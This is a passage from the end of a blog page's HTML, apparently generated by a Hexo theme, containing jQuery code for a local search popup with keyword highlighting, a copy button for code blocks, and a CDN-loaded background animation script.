                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
  

  
  

  


  

  

  

  

  

  

  

  

  
<script>
  $('.highlight').not('.gist .highlight').each(function(i, e) {
    var $wrap = $('<div>').addClass('highlight-wrap');
    $(e).after($wrap);
    $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function(e) {
      var code = $(this).parent().find('.code').find('.line').map(function(i, e) {
        return $(e).text();
      }).toArray().join('\n');
      var ta = document.createElement('textarea');
      var yPosition = window.pageYOffset || document.documentElement.scrollTop;
      ta.style.top = yPosition + 'px'; // Prevent page scroll
      ta.style.position = 'absolute';
      ta.style.opacity = '0';
      ta.readOnly = true;
      ta.value = code;
      document.body.appendChild(ta);
      ta.select();
      ta.setSelectionRange(0, code.length);
      ta.readOnly = false;
      var result = document.execCommand('copy');
      
        if (result) $(this).text('复制成功');
        else $(this).text('复制失败');
      
      ta.blur(); // For iOS
      $(this).blur();
    })).on('mouseleave', function(e) {
      var $b = $(this).find('.copy-btn');
      setTimeout(function() {
        $b.text('复制');
      }, 300);
    }).append(e);
  })
</script>


  

  

  
  
	<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  
</body>
</html>
